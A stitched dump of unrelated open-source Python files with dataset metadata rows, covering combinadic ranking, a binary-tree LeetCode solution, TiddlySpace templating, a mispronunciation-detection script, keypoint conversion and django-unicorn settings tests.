    >>> choose(4, 4)
    1
    >>> choose(3, 4)
    0
    >>> choose(0, 1)
    0
    >>> choose(7, -1)
    0
    """
    if b < 0:
        return 0
    elif b == a:
        return 1
    elif b > a:
        return 0

    # The divisor always divides the numerator exactly, so // is lossless.
    return math.factorial(a) // (math.factorial(b) * math.factorial(a - b))
def encode(perm: List[int]) -> int:
    """Encode a strictly decreasing digit list into its combinadic rank.

    Digit perm[i] is weighted by C(perm[i], k) where k runs from len(perm)
    down to 1.

    >>> encode([11, 10, 9, 8, 3, 2, 1, 0])
    425
    >>> encode([7, 6, 5, 4, 3, 2, 1, 0])
    0
    """
    weights = range(len(perm), 0, -1)
    return sum(choose(digit, k) for k, digit in zip(weights, perm))
def decode(n: int, k: int, start: int) -> List[int]:
    """Decode rank *n* into its k-digit combinadic, scanning down from *start*.

    Greedy: walk candidates from start-1 down to 0, taking each one whose
    binomial weight still fits into the remaining rank.

    >>> decode(0, 8, 24)
    [7, 6, 5, 4, 3, 2, 1, 0]
    >>> decode(425, 8, 24)
    [11, 10, 9, 8, 3, 2, 1, 0]
    """
    digits = []
    remaining = n
    slots = k
    for candidate in reversed(range(start)):
        weight = choose(candidate, slots)
        if weight <= remaining:
            remaining -= weight
            slots -= 1
            digits.append(candidate)
    return digits
def state_to_list(state: str) -> List[int]:
    """Return the occupied positions of *state* (any char but 'x'), descending.

    >>> state_to_list('xxLL')
    [3, 2]
    >>> state_to_list('LLxx')
    [1, 0]
    >>> state_to_list('LxLx')
    [2, 0]
    >>> state_to_list('xLxL')
    [3, 1]
    """
    occupied = [pos for pos, char in enumerate(state) if char != "x"]
    occupied.sort(reverse=True)
    return occupied
def state_to_rank(state: str) -> int:
    """Map a state string to its combinatorial rank (via its position list).

    >>> state_to_rank('xxLL')
    5
    >>> state_to_rank('LLxx')
    0
    >>> state_to_rank('LxLx')
    1
    >>> state_to_rank('xLxL')
    4
    """
    return encode(state_to_list(state))
if __name__ == "__main__":
    # standard libraries
    import doctest

    # Run the doctest examples embedded in this module's docstrings.
    doctest.testmod()
| 15.919708 | 79 | 0.497478 | 307 | 2,181 | 3.403909 | 0.289902 | 0.073684 | 0.063158 | 0.015311 | 0.076555 | 0.03445 | 0.03445 | 0.03445 | 0 | 0 | 0 | 0.069156 | 0.337001 | 2,181 | 136 | 80 | 16.036765 | 0.653527 | 0.339752 | 0 | 0.204545 | 0 | 0 | 0.007353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113636 | false | 0 | 0.068182 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41c9205a05089b2cfa8d6a14c30a8d7f603ca089 | 835 | py | Python | assignments/a3/constructBinaryTreeFromPreorderAndInorderTraversal.py | jcdiv47/geekbang-algorithms | 38dae85aeadb684b2c44945bd07a32cdede4ad5a | [
"MIT"
] | null | null | null | assignments/a3/constructBinaryTreeFromPreorderAndInorderTraversal.py | jcdiv47/geekbang-algorithms | 38dae85aeadb684b2c44945bd07a32cdede4ad5a | [
"MIT"
] | null | null | null | assignments/a3/constructBinaryTreeFromPreorderAndInorderTraversal.py | jcdiv47/geekbang-algorithms | 38dae85aeadb684b2c44945bd07a32cdede4ad5a | [
"MIT"
] | null | null | null | """
Leetcode: https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/
"""
# Definition for a binary tree node.
class TreeNode:
    """A binary-tree node holding a value and optional left/right children."""

    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right
class Solution:
    """Rebuild a binary tree from its preorder and inorder traversals.

    Assumes the tree's values are unique (the LeetCode problem guarantees
    this) — TODO confirm for any other caller.
    """

    def buildTree(self, preorder, inorder):
        """Return the root of the tree described by the two traversals.

        Args:
            preorder: list of node values in preorder.
            inorder: list of the same values in inorder.

        Returns:
            The root TreeNode, or None for empty input.
        """
        # Map each value to its inorder position once, so each recursive
        # step is O(1) instead of a linear scan; recursing on index ranges
        # avoids the O(n) list slices of the naive approach, bringing the
        # total cost from O(n^2) down to O(n).
        inorder_idx = {val: i for i, val in enumerate(inorder)}

        def build(pre_lo, pre_hi, in_lo, in_hi):
            # Helper: build the subtree for preorder[pre_lo:pre_hi+1] /
            # inorder[in_lo:in_hi+1].
            if pre_lo > pre_hi:
                return None
            root = TreeNode(preorder[pre_lo])
            root_pos = inorder_idx[root.val]
            left_size = root_pos - in_lo
            root.left = build(pre_lo + 1, pre_lo + left_size,
                              in_lo, root_pos - 1)
            root.right = build(pre_lo + left_size + 1, pre_hi,
                               root_pos + 1, in_hi)
            return root

        return build(0, len(preorder) - 1, 0, len(inorder) - 1)
| 29.821429 | 97 | 0.603593 | 108 | 835 | 4.555556 | 0.388889 | 0.113821 | 0.065041 | 0.073171 | 0.089431 | 0.089431 | 0 | 0 | 0 | 0 | 0 | 0.01495 | 0.279042 | 835 | 27 | 98 | 30.925926 | 0.802326 | 0.208383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41cb04f14dbe73f40c68a5e989b2ab363ee6874c | 3,415 | py | Python | tiddlywebplugins/tiddlyspace/template.py | TiddlySpace/tiddlyspace | 5f2139340d2d9e3a37068b5c58ecb2e599d798b8 | [
"BSD-3-Clause"
] | 32 | 2015-01-04T10:54:29.000Z | 2022-01-22T16:45:24.000Z | tiddlywebplugins/tiddlyspace/template.py | TiddlySpace/tiddlyspace | 5f2139340d2d9e3a37068b5c58ecb2e599d798b8 | [
"BSD-3-Clause"
] | 4 | 2016-12-08T14:04:26.000Z | 2018-02-20T10:23:33.000Z | tiddlywebplugins/tiddlyspace/template.py | TiddlySpace/tiddlyspace | 5f2139340d2d9e3a37068b5c58ecb2e599d798b8 | [
"BSD-3-Clause"
] | 14 | 2015-01-19T23:18:20.000Z | 2021-06-22T01:10:08.000Z | """
Send a template with some default data.
"""
from jinja2 import TemplateNotFound
from tiddlywebplugins.virtualhosting import original_server_host_url
from tiddlyweb import control
from tiddlyweb.model.tiddler import Tiddler
from tiddlyweb.model.recipe import Recipe
from tiddlyweb.store import StoreError
from tiddlywebplugins.templates import get_template
from tiddlyweb.web.util import server_base_url, encode_name
from tiddlywebplugins.tiddlyspace.web import (determine_space,
determine_space_recipe, determine_host)
CUSTOMIZABLES = ['friendlytiddler.html', 'friendlytiddlers.html',
'search.html']
def send_template(environ, template_name, template_data=None):
    """
    Set some defaults for a template and send the output.

    ``environ`` is the WSGI environment (with tiddlyweb extensions),
    ``template_name`` names the template to render, and ``template_data``
    is an optional dict of variables merged over the defaults.
    Returns the generated template output.
    """
    default_css_tiddler = '/bags/common/tiddlers/profile.css'
    if template_data is None:
        template_data = {}
    # A space may configure a custom HTML template prefix; if set, prefer
    # the prefixed template (and its matching CSS) but fall back to the
    # unprefixed one when the prefixed template does not exist.
    html_template_prefix = environ['tiddlyweb.space_settings']['htmltemplate']
    if html_template_prefix:
        default_css_tiddler = ('/bags/common/tiddlers/%s.css' %
                html_template_prefix)
        html_template_prefix += '/'
        try:
            name = html_template_prefix + template_name
            template = get_template(environ, name)
        except TemplateNotFound:
            template = get_template(environ, template_name)
    else:
        template = get_template(environ, template_name)
    store = environ['tiddlyweb.store']
    # URLs of CSS/JS resources to be linked in the rendered page.
    linked_resources = {
        'HtmlCss': [],
        'HtmlJavascript': []}
    if not html_template_prefix or template_name in CUSTOMIZABLES:
        linked_resources['HtmlCss'] = [default_css_tiddler]
    # Load CSS and JavaScript overrides.
    current_space = determine_space(environ, determine_host(environ)[0])
    if current_space:
        recipe_name = determine_space_recipe(environ, current_space)
        try:
            recipe = store.get(Recipe(recipe_name))
            # Look for HtmlCss / HtmlJavascript tiddlers in the space's
            # recipe; when present they override/extend the defaults.
            for title in linked_resources:
                try:
                    tiddler = Tiddler(title)
                    bag = control.determine_bag_from_recipe(recipe,
                            tiddler, environ)
                    tiddler.bag = bag.name
                    try:
                        tiddler = store.get(tiddler)
                        if 'Javascript' in title:
                            # The JS tiddler's text is a newline-separated
                            # list of script URLs.
                            url_content = tiddler.text.strip()
                            if url_content:
                                urls = url_content.split('\n')
                                linked_resources[title] = urls
                        else:
                            # CSS is linked directly as the tiddler's URL.
                            url = '/bags/%s/tiddlers/%s' % (encode_name(
                                tiddler.bag), title)
                            linked_resources[title] = [url]
                    except StoreError:
                        continue
                except StoreError:
                    pass
        except StoreError:
            # Missing recipes/bags/tiddlers are a normal condition here:
            # overrides are best-effort, so store errors are swallowed.
            pass
    template_defaults = {
        'original_server_host': original_server_host_url(environ),
        'css': linked_resources['HtmlCss'],
        'js': linked_resources['HtmlJavascript'],
        'server_host': server_base_url(environ),
    }
    # Caller-supplied data wins over the defaults.
    template_defaults.update(template_data)
    return template.generate(template_defaults)
| 38.370787 | 78 | 0.585652 | 324 | 3,415 | 5.935185 | 0.271605 | 0.054602 | 0.056162 | 0.042122 | 0.075923 | 0.075923 | 0 | 0 | 0 | 0 | 0 | 0.000886 | 0.339092 | 3,415 | 88 | 79 | 38.806818 | 0.85113 | 0.037775 | 0 | 0.185714 | 0 | 0 | 0.086424 | 0.032485 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014286 | false | 0.028571 | 0.128571 | 0 | 0.157143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41cb1605a676dad204255fde9474a9b324ee8353 | 588 | py | Python | test.py | yanzhenxing123/illegal_fund_raising_forecast | dcff8f3d73c1f1ea3548e8d25afc9fe5233e3f64 | [
"Apache-2.0"
] | null | null | null | test.py | yanzhenxing123/illegal_fund_raising_forecast | dcff8f3d73c1f1ea3548e8d25afc9fe5233e3f64 | [
"Apache-2.0"
] | null | null | null | test.py | yanzhenxing123/illegal_fund_raising_forecast | dcff8f3d73c1f1ea3548e8d25afc9fe5233e3f64 | [
"Apache-2.0"
] | null | null | null | """
@Author: yanzx
@Date: 2021-08-10 09:27:55
@Desc:
"""
import time
# Build one million strings, plus a set copy, to compare membership-test
# speed: list lookup is O(n), set lookup is O(1).
li = [str(i) + "闫振兴" for i in range(1000000)]
li_s = set(li)
# Time a membership test against the list (linear scan).
start_time1 = time.time()
if "100000闫振兴" in li:
    print(time.time() - start_time1)
# Time the same membership test against the set (hash lookup).
start_time2 = time.time()
if "100000闫振兴" in li_s:
    print(time.time() - start_time2)
import pandas as pd
import numpy as np
import json
# Read the local sample CSV, keep rows 1-19, and dump them as a list of
# per-row dicts via the DataFrame's JSON round-trip.
df =pd.read_csv("./testdata.csv")
df = df.iloc[1:20, :]
res = list(json.loads(df.to_json(orient='index')).values())
print(res)
data_array = np.array(df)
# Then convert the array to list form.
data_list =data_array.tolist()
# print(data_list)
| 14 | 59 | 0.664966 | 99 | 588 | 3.828283 | 0.525253 | 0.084433 | 0.05277 | 0.100264 | 0.121372 | 0.121372 | 0 | 0 | 0 | 0 | 0 | 0.081466 | 0.164966 | 588 | 41 | 60 | 14.341463 | 0.690428 | 0.134354 | 0 | 0 | 0 | 0 | 0.080483 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
68b72c53435e9aa9b4922a013905036e51730503 | 7,953 | py | Python | mispro/mispro.py | dzubke/speech-lite | 65f83ac2b7551650820f079ce5152741f2a6fdb8 | [
"Apache-2.0"
] | null | null | null | mispro/mispro.py | dzubke/speech-lite | 65f83ac2b7551650820f079ce5152741f2a6fdb8 | [
"Apache-2.0"
] | null | null | null | mispro/mispro.py | dzubke/speech-lite | 65f83ac2b7551650820f079ce5152741f2a6fdb8 | [
"Apache-2.0"
] | null | null | null | # these functions help to detect mispronunciations using editops
#
#
# standard libs
import argparse
# third-party libs
import Levenshtein as lev
# local libs
from speech.utils.data_helpers import path_to_id
from speech.utils.io import read_data_json
def main(hypo_path:str, tgt_path:str, eval_phn_path:str) -> None:
    """This function will aim to detect mispronunciations of the `target_phn`
    in the predictions in `hypo_path` when compared with the reference in `phn_path`

    Args:
        hypo_path: path to model predictions
        tgt_path: path to phones the speaker should have said
        eval_phn_path: path to one-hot encoded labels of evaluation phonemes

    Notes:
        hypo_path file is formatted as:
            ay ih t (None-0)
            ao r dh ah t ay m (None-7)
            ay l iy v d uw (None-6)
        tgt_path file is formatted as:
            ay iy t
            p r ih t iy sh
            dh ah jh ih m
        eval_phn_path:
            id  l r dh p v
            00F931A9-6EA9-4233-85B4-94015A257352	1	0	0	0	1	0
            012C1AC5-13E0-4337-B6CC-BFD58A12A8BC	1	1	0	0	0	0
            054C13A4-9499-453F-90A0-950DA50C4576	1	0	1	0	0	0
    """
    # Parse the hypothesis file into {utterance index: predicted phones}.
    hypo_dict = {}
    with open(hypo_path, 'r') as hypo_f:
        for line in hypo_f:
            line = line.strip().split()
            phones = line[:-1]
            # line last element has format '(None-1)'
            hypo_id = int(line[-1].split('-')[1].replace(')', ''))
            hypo_dict[hypo_id] = phones
    # create mapping from record_id to hypo numerical ordering
    tsv_path = tgt_path.replace(".phn", ".tsv")
    id_to_order = {}
    with open(tsv_path, 'r') as tsv_f:
        # First tsv line is a header; skip it.
        _ = next(tsv_f)
        for i, line in enumerate(tsv_f):
            sub_path = line.strip().split('\t', maxsplit=1)[0]
            id_to_order[path_to_id(sub_path)] = i
    # Map each utterance's ordering index to (record_id, has_mispro, phones).
    ord_to_eval_phns = read_eval_file(eval_phn_path, id_to_order)
    with open(tgt_path, 'r') as phn_f:
        for i, line in enumerate(phn_f):
            ref_phns = line.strip().split()
            hyp_phns = hypo_dict[i]
            # Edit operations between prediction and reference phones.
            edit_ops = get_editops(hyp_phns, ref_phns)
            try:
                rec_id, has_mispro, eval_phns = ord_to_eval_phns[i]
            except KeyError as e:
                print(f"Key error at index: {i} with line: {line}")
                raise e
            # Report detection results for each phoneme under evaluation.
            for eval_phn in eval_phns:
                print(f"record id: {rec_id}")
                print(f"evaluation phone: {eval_phn}")
                print(f"has mispro: {bool(has_mispro)}")
                print_editops(edit_ops, hyp_phns, ref_phns)
                mispro_detected = check_mispro(edit_ops, hyp_phns, ref_phns, eval_phn)
                print(f"mispro detected?: {mispro_detected}")
                print(f"detector is correct?: {has_mispro == mispro_detected}")
                print('\n\n')
def assess_from_json(eval_phn_path: str, ds_json_path: str) -> None:
    """Assess mispronunciation detection from a dataset-json of predictions.

    Mirrors ``main`` but reads reference labels and predictions from a
    dataset json (entries with 'label', 'prediction', and 'filename' keys)
    instead of separate hypothesis/target files. Results are printed.

    Args:
        eval_phn_path: path to one-hot encoded labels of evaluation phonemes
        ds_json_path: path to the dataset json with model predictions
    """
    ds_preds = read_data_json(ds_json_path)
    # Map record_id to (record_id, has_mispro, evaluation phones).
    rec_to_eval_phns = read_eval_file(eval_phn_path)
    for xmpl in ds_preds:
        ref_phns = xmpl['label']
        hyp_phns = xmpl['prediction']
        edit_ops = get_editops(hyp_phns, ref_phns)
        rec_id = path_to_id(xmpl['filename'])
        rec_id, has_mispro, eval_phns = rec_to_eval_phns[rec_id]
        # Report detection results for each phoneme under evaluation.
        for eval_phn in eval_phns:
            print(f"record id: {rec_id}")
            print(f"evaluation phone: {eval_phn}")
            print(f"has mispro: {bool(has_mispro)}")
            print_editops(edit_ops, hyp_phns, ref_phns)
            mispro_detected = check_mispro(edit_ops, hyp_phns, ref_phns, eval_phn)
            print(f"mispro detected?: {mispro_detected}")
            print(f"detector is correct?: {has_mispro == mispro_detected}")
            print('\n\n')
def read_eval_file(eval_phn_path: str, id_to_order: dict = None) -> dict:
    """Reads the eval-phn file that contains information on the mispronunciations
    for each record and returns that information as a mapping from record to phonemes.

    Args:
        eval_phn_path: path to eval file
        id_to_order: mapping from record_id to the ordering. used for w2v files
    Returns:
        dict: mapping record_id or order to target phonemes information
    """
    lookup = {}
    with open(eval_phn_path, 'r') as eval_f:
        # The header row names the phoneme columns after id + mispro flag.
        header_cols = next(eval_f).strip().split()
        phoneme_names = header_cols[2:]
        for row in eval_f:
            cols = row.strip().split('\t')
            record_id = cols[0]
            has_mispro = int(cols[1])
            one_hot = [int(value) for value in cols[2:]]
            # Translate the one-hot row back into phoneme names.
            phones = [phoneme_names[i] for i, flag in enumerate(one_hot) if flag == 1]
            if id_to_order:
                key = id_to_order[record_id]
            else:
                key = record_id
            lookup[key] = (record_id, has_mispro, phones)
    return lookup
def check_mispro(edit_ops, hyp_phns, ref_phns, target_phn):
    """Return True when the edit operations imply a mispronunciation of
    ``target_phn``.

    A mispronunciation is an edit whose reference phone contains the target
    phone, excluding deletions and excluding edits where the hypothesis
    phone also contains the target (e.g. 'r' replaced by 'er').
    """
    # Pad both lists so every editop index is addressable.
    hyp_phns, ref_phns = balance_phn_lengths(edit_ops, hyp_phns, ref_phns)
    return any(
        op != 'delete'
        and target_phn in ref_phns[dst_i]
        and target_phn not in hyp_phns[src_i]
        for op, src_i, dst_i in edit_ops
    )
def balance_phn_lengths(edit_ops, s_phns, d_phns):
    """Pad the source/dest phone lists with 'blank' entries (in place) so
    every index referenced by ``edit_ops`` is addressable."""
    for _, src_i, dst_i in edit_ops:
        while len(s_phns) <= src_i:
            s_phns.append('blank')
        while len(d_phns) <= dst_i:
            d_phns.append('blank')
    return s_phns, d_phns
def get_editops(hyp_phns, ref_phns):
    """Compute Levenshtein edit operations between two phoneme sequences.

    Each distinct phoneme is mapped to a single character so the sequences
    can be compared with the C-level Levenshtein string functions.

    Args:
        hyp_phns: hypothesis (predicted) phonemes
        ref_phns: reference (target) phonemes

    Returns:
        list of (op, src_pos, dst_pos) tuples from ``Levenshtein.editops``
    """
    # One stable phoneme -> char mapping shared by both sequences; the
    # reverse mapping the original built here was never used and is dropped.
    phn_to_char = {
        ph: chr(65 + i) for i, ph in enumerate(sorted(set(hyp_phns + ref_phns)))
    }
    hyp_chars = "".join(phn_to_char[ph] for ph in hyp_phns)
    ref_chars = "".join(phn_to_char[ph] for ph in ref_phns)
    return lev.editops(hyp_chars, ref_chars)
def print_editops(edit_ops, hyp_phns, ref_phns):
    """Pretty-print Levenshtein edit operations between two phone lists.

    Args:
        edit_ops: (op, src_pos, dst_pos) tuples as produced by get_editops
        hyp_phns: hypothesis (predicted) phonemes
        ref_phns: reference (target) phonemes
    """
    print(f"hypos: {hyp_phns}")
    print(f"tgts: {ref_phns}")
    # Pad both lists so every editop index is addressable.
    hyp_phns, ref_phns = balance_phn_lengths(edit_ops, hyp_phns, ref_phns)
    for op, spos, dpos in edit_ops:
        try:
            print(
                '{:7} s[{}] --> d[{}] {!r:>8} --> {!r}'.\
                format(op, spos, dpos, hyp_phns[spos], ref_phns[dpos])
            )
        except IndexError as e:
            # Padding should prevent this; dump context before re-raising.
            print("Index Error")
            print(op, spos, dpos, hyp_phns, ref_phns)
            raise e
if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description=""
    )
    # "--action" selects the entry point: "" runs main() on the hypothesis
    # and phone files; "assess-from-json" runs assess_from_json().
    parser.add_argument(
        "--action", help="determines what function to call"
    )
    parser.add_argument(
        "--hypo-path", help="path to w2v predictions"
    )
    parser.add_argument(
        "--json-path", help="path to json prediction for deepspeech model"
    )
    parser.add_argument(
        "--phn-path", help="path to w2v predictions"
    )
    parser.add_argument(
        "--eval-phn-path", type=str, help="path to one-hot encoding for evaluation phonemes by utterance id"
    )
    args = parser.parse_args()
    if args.action == "":
        main(args.hypo_path, args.phn_path, args.eval_phn_path)
    elif args.action == "assess-from-json":
        assess_from_json(args.eval_phn_path, args.json_path)
| 36.481651 | 108 | 0.592355 | 1,145 | 7,953 | 3.868996 | 0.215721 | 0.034763 | 0.036117 | 0.047404 | 0.365463 | 0.307223 | 0.24763 | 0.228217 | 0.196388 | 0.145824 | 0 | 0.021439 | 0.307934 | 7,953 | 217 | 109 | 36.64977 | 0.78343 | 0.222306 | 0 | 0.276119 | 0 | 0 | 0.129801 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052239 | false | 0 | 0.029851 | 0 | 0.11194 | 0.156716 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
68b8f74ca63a7bf7763bdfc88965696eef401268 | 1,980 | py | Python | pipelines/utils/conv_to_json.py | cds-mipt/HPointLoc | b346c10928939ddc1fe5840aef5085418e3aa0ad | [
"MIT"
] | 2 | 2021-05-30T04:04:51.000Z | 2022-02-21T09:11:27.000Z | pipelines/utils/conv_to_json.py | cds-mipt/HPointLoc | b346c10928939ddc1fe5840aef5085418e3aa0ad | [
"MIT"
] | null | null | null | pipelines/utils/conv_to_json.py | cds-mipt/HPointLoc | b346c10928939ddc1fe5840aef5085418e3aa0ad | [
"MIT"
] | null | null | null | from tqdm import tqdm
import h5py
from os.path import join
import os
import numpy as np
from pathlib import Path
import json
import numpy as np
MAXDEPTH = 10
def conv_to_json(dataset_root, path_to_npz_folder, output_dir):
    """Convert matched-keypoint .npz pairs into per-pair .json files.

    For each npz file (named `<qfold>_<qcloud>_query_<qname>_<mfold>_
    <mcloud>_mapping_<mname>_...`), looks up the query/mapping depth maps
    in the HPointLoc HDF5 dataset, attaches a depth value to every matched
    keypoint, and writes `{query_id: [(x, y, depth), ...], map_id: [...]}`
    to `<output_dir>/<query_id>_<map_id>.json`.

    Args:
        dataset_root: path inside the datasets tree; its parent is assumed
            to contain the 'HPointLoc_dataset' folder.
        path_to_npz_folder: folder of npz files with 'keypoints0',
            'keypoints1' and 'matches' arrays.
        output_dir: destination folder for the json files (created if
            missing).
    """
    root_datasets = Path(dataset_root).parent
    dataset_path = join(root_datasets, 'HPointLoc_dataset')
    pairs_npz = os.listdir(path_to_npz_folder)
    os.makedirs(output_dir, exist_ok = True)
    for pair_npz in tqdm(pairs_npz):
        npz = np.load(join(path_to_npz_folder, pair_npz))
        # Filename encodes query (first 4 tokens) and mapping (next 4).
        q_fold, q_cloud, query, q_name = pair_npz.split('_')[:4]
        m_fold, m_cloud, mapping, m_name = pair_npz.split('_')[4:8]
        q = '_'.join(pair_npz.split('_')[:4])
        m = '_'.join(pair_npz.split('_')[4:8])
        q_cloud = q_fold + '_point' + q_cloud + '.hdf5'
        m_cloud = m_fold + '_point' + m_cloud + '.hdf5'
        hdf5_q_path = join(dataset_path, q_fold, q_cloud)
        hdf5_m_path = join(dataset_path, m_fold, m_cloud)
        # NOTE(review): the HDF5 files are never closed; consider `with
        # h5py.File(...)` to avoid leaking file handles over a long run.
        q_file = h5py.File(hdf5_q_path, 'r')
        m_file = h5py.File(hdf5_m_path, 'r')
        depth_base = m_file['depth_base']
        depth = q_file['depth']
        # Depth maps appear to be stored normalized; scaling by MAXDEPTH
        # presumably restores meters — TODO confirm against dataset docs.
        q_depth = np.squeeze(depth[int(q_name)])*MAXDEPTH
        m_depth = np.squeeze(depth_base[int(m_name)])*MAXDEPTH
        q_coord_frame = []
        m_coord_frame = []
        # Collect (x, y, depth) for every keypoint with a valid match
        # (matches[kpt] == -1 marks "no match").
        for kpt in range(min(npz['keypoints1'].shape[0], npz['matches'].shape[0])):
            if npz['matches'][kpt] != -1:
                x_q, y_q = map(int, npz['keypoints0'][kpt])
                x_m, y_m = map(int, npz['keypoints1'][npz['matches'][kpt]])
                q_coord_frame.append((x_q, y_q, float(q_depth[y_q, x_q])))
                m_coord_frame.append((x_m, y_m, float(m_depth[y_m, x_m])))
        dictionary_kpt = {q: q_coord_frame, m:m_coord_frame}
        outpath = join(output_dir, q + '_' + m + '.json')
        with open(outpath, 'w') as outfile:
            # NOTE(review): dumping str(dict) writes a single quoted Python
            # repr string, not structured JSON; downstream readers must
            # parse that repr — verify this is intentional.
            json.dump(str(dictionary_kpt), outfile)
| 36.666667 | 84 | 0.609596 | 306 | 1,980 | 3.607843 | 0.25817 | 0.038043 | 0.043478 | 0.047101 | 0.067029 | 0.027174 | 0 | 0 | 0 | 0 | 0 | 0.015509 | 0.25101 | 1,980 | 53 | 85 | 37.358491 | 0.728928 | 0 | 0 | 0.047619 | 0 | 0 | 0.060606 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02381 | false | 0 | 0.190476 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
68b9f1d61e16d200b4bd96fbc017a9c896eef126 | 1,020 | py | Python | tests/test_settings.py | nerdoc/django-unicorn | e512b8f64f5c276a78127db9a05d9d5c042232d5 | [
"MIT"
] | 1 | 2021-12-21T16:20:49.000Z | 2021-12-21T16:20:49.000Z | tests/test_settings.py | teury/django-unicorn | 5e9142b8a7e13b862ece419d567e805cc783b517 | [
"MIT"
] | null | null | null | tests/test_settings.py | teury/django-unicorn | 5e9142b8a7e13b862ece419d567e805cc783b517 | [
"MIT"
] | 1 | 2022-02-10T07:47:01.000Z | 2022-02-10T07:47:01.000Z | from django_unicorn.settings import get_cache_alias, get_serial_enabled, get_settings
def test_settings_cache_alias(settings):
    """CACHE_ALIAS from the UNICORN setting is returned by get_cache_alias."""
    settings.UNICORN["CACHE_ALIAS"] = "unicorn_cache"
    assert get_cache_alias() == "unicorn_cache"
def test_settings_legacy(settings):
    """The deprecated DJANGO_UNICORN setting name is still honored."""
    settings.DJANGO_UNICORN = {"CACHE_ALIAS": "unicorn_cache"}
    assert get_cache_alias() == "unicorn_cache"
def test_get_serial_enabled(settings):
    """get_serial_enabled reflects SERIAL.ENABLED and the cache backend."""
    serial_settings = settings.UNICORN["SERIAL"]

    # Explicitly disabled.
    serial_settings["ENABLED"] = False
    assert get_serial_enabled() is False

    # Enabled with the default cache configuration.
    serial_settings["ENABLED"] = True
    assert get_serial_enabled() is True

    # Enabled, but the configured cache alias points at a dummy backend.
    serial_settings["ENABLED"] = True
    settings.CACHES["unicorn_cache"] = {
        "BACKEND": "django.core.cache.backends.dummy.DummyCache"
    }
    settings.UNICORN["CACHE_ALIAS"] = "unicorn_cache"
    assert get_serial_enabled() is False
| 29.142857 | 85 | 0.721569 | 120 | 1,020 | 5.833333 | 0.208333 | 0.171429 | 0.114286 | 0.102857 | 0.544286 | 0.418571 | 0.271429 | 0.271429 | 0.271429 | 0.271429 | 0 | 0 | 0.163725 | 1,020 | 34 | 86 | 30 | 0.820633 | 0 | 0 | 0.5 | 0 | 0 | 0.208824 | 0.042157 | 0 | 0 | 0 | 0 | 0.208333 | 1 | 0.125 | false | 0 | 0.041667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
68bd12edd81d237215484f0a679fa547355b6ddd | 5,132 | py | Python | tests/test_algolia_doc_manager.py | algolia/mongo-connector | d668e9fb556abe63916ba0594e035d2f34880b1c | [
"Apache-2.0"
] | 15 | 2015-01-06T08:10:21.000Z | 2017-03-12T23:06:43.000Z | tests/test_algolia_doc_manager.py | algolia/mongo-connector | d668e9fb556abe63916ba0594e035d2f34880b1c | [
"Apache-2.0"
] | 16 | 2015-03-11T09:28:33.000Z | 2016-03-06T14:45:54.000Z | tests/test_algolia_doc_manager.py | algolia/mongo-connector | d668e9fb556abe63916ba0594e035d2f34880b1c | [
"Apache-2.0"
] | 13 | 2015-03-21T13:39:10.000Z | 2022-03-14T11:50:24.000Z | # Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for the Algolia DocManager."""
import base64
import sys
import time
sys.path[0:0] = [""]
from tests import elastic_pair, unittest, TESTARGS
from tests.test_algolia import AlgoliaTestCase
from tests.test_gridfs_file import MockGridFSFile
